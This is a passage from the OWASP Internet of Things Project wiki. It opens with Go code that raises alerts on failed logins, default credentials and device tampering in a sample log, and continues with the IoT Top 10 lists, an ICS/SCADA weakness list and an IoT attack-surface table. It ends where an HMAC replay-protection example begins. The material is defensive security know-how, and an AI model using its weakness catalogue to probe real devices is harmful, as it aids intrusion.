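// Event is one parsed log line: a timestamp plus key=value fields (format and field names are this example's own).
type Event struct {
	At     time.Time
	Fields map[string]string
}

// Alert is one logging-project event: table row (Category), entry in that row (Event), and the user, source or device concerned.
type Alert struct{ Category, Event, Subject string }

const failedPasswordThreshold, loginRateThreshold = 3, 4 // failures per user; attempts per source
const loginRateWindow = 60 * time.Second                  // window for the rate rule

// ParseLine parses "<RFC3339 timestamp> key=value ..."; fields without '=' are ignored, a bad timestamp is an error.
func ParseLine(line string) (Event, error) {
	parts := strings.Fields(line)
	if len(parts) < 2 {
		return Event{}, fmt.Errorf("malformed line: %q", line)
	}
	at, err := time.Parse(time.RFC3339, parts[0])
	if err != nil {
		return Event{}, err
	}
	ev := Event{At: at, Fields: map[string]string{}}
	for _, kv := range parts[1:] {
		if k, v, ok := strings.Cut(kv, "="); ok {
			ev.Fields[k] = v
		}
	}
	return ev, nil
}

// Analyze applies the rules to events given in time order; disenrolled holds device IDs removed from the ecosystem.
func Analyze(events []Event, disenrolled map[string]bool) []Alert {
	var alerts []Alert
	failures := map[string]int{}         // user -> failed logins since last success
	attempts := map[string][]time.Time{} // source -> login attempts inside the window
	for _, ev := range events {
		f := ev.Fields
		dev := f["device"]
		if disenrolled[dev] {
			alerts = append(alerts, Alert{"Ecosystem Membership Exceptions", "Traffic Seen from Disenrolled System", dev})
		}
		switch f["event"] {
		case "login":
			src, user := f["src"], f["user"]
			recent := attempts[src]
			for len(recent) > 0 && ev.At.Sub(recent[0]) >= loginRateWindow {
				recent = recent[1:] // attempts are in time order, so expire from the front
			}
			attempts[src] = append(recent, ev.At)
			if len(attempts[src]) == loginRateThreshold {
				alerts = append(alerts, Alert{"Authentication Exceptions", "High Rate of Login Attempts", src})
			}
			if f["result"] != "ok" {
				if failures[user]++; failures[user] == failedPasswordThreshold {
					alerts = append(alerts, Alert{"Authentication Exceptions", "Multiple Failed Passwords", user})
				}
			} else {
				failures[user] = 0
				if f["cred"] == "default" { // device reports it is still on factory credentials
					alerts = append(alerts, Alert{"Administrative Mode Events", "Device Accessed Using Default Administrative Credentials", dev})
				}
			}
		case "tamper":
			alerts = append(alerts, Alert{"Device Access Events", "Device Case Tampering Detected", dev})
		}
	}
	return alerts
}

// sampleLog is constructed for this example, not taken from a real device.
const sampleLog = `
2024-05-01T12:00:00Z device=cam-01 src=203.0.113.5 user=admin event=login result=fail
2024-05-01T12:00:05Z device=cam-01 src=203.0.113.5 user=admin event=login result=fail
2024-05-01T12:00:10Z device=cam-01 src=203.0.113.5 user=admin event=login result=fail
2024-05-01T12:00:20Z device=cam-01 src=203.0.113.5 user=admin event=login result=ok cred=default
2024-05-01T12:01:00Z device=cam-09 src=198.51.100.7 event=heartbeat
2024-05-01T12:01:30Z device=cam-02 src=198.51.100.9 event=tamper
`

// DemoAlerts runs the rules over sampleLog with cam-09 disenrolled.
func DemoAlerts() []Alert {
	var events []Event
	for _, line := range strings.Split(strings.TrimSpace(sampleLog), "\n") {
		ev, err := ParseLine(line)
		if err != nil {
			panic(err)
		}
		events = append(events, ev)
	}
	return Analyze(events, map[string]bool{"cam-09": true})
}
```
<br />
Each alert carries the table's category and event name so it maps directly onto an AppSensor-style detection point; the thresholds are deliberately low so the six sample lines trip every rule and should be tuned per deployment, and the per-source window resets naturally because attempts outside it are dropped before counting.<br />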
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to provide input for a solid detection and response program around IoT devices, and companies that want to build one have few good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}<br />
{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
Details coming soon. For information on how to get started with contributing, see the "Project Task List" in the download section. <br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. It is a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write interoperable applications regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is an open-membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
Aaron.guzman
https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248641
OWASP Internet of Things Project
2019-03-12T03:12:26Z
<p>Aaron.guzman: /* OWASP Internet of Things (IoT) Project */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including manufacturing, consulting, security testing, development, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon this work, you distribute the resulting work only under the same or a similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the attacks they are exposed to (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static key for both encryption and decryption across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing environment manipulation<br />
* Tampering (physical)<br />
* Damage (physical)<br />
<br />
|-<br />
|}<br />
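Several rows of the table above ("Device Network Services" and "Ecosystem Communication": lack of message integrity check, lack of payload verification, replay attack) describe the same failure: a device or backend accepting commands whose origin and freshness it cannot verify. The following is an added example, not code from the OWASP IoT Project, showing one defensive pattern: every message carries a monotonic counter and an HMAC-SHA256 over device id, counter and payload, and the receiver checks the MAC in constant time before it consults the counter, so tampered, forged and replayed messages are all rejected. The shared key, device id and payloads are constructed for the demo.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass, field
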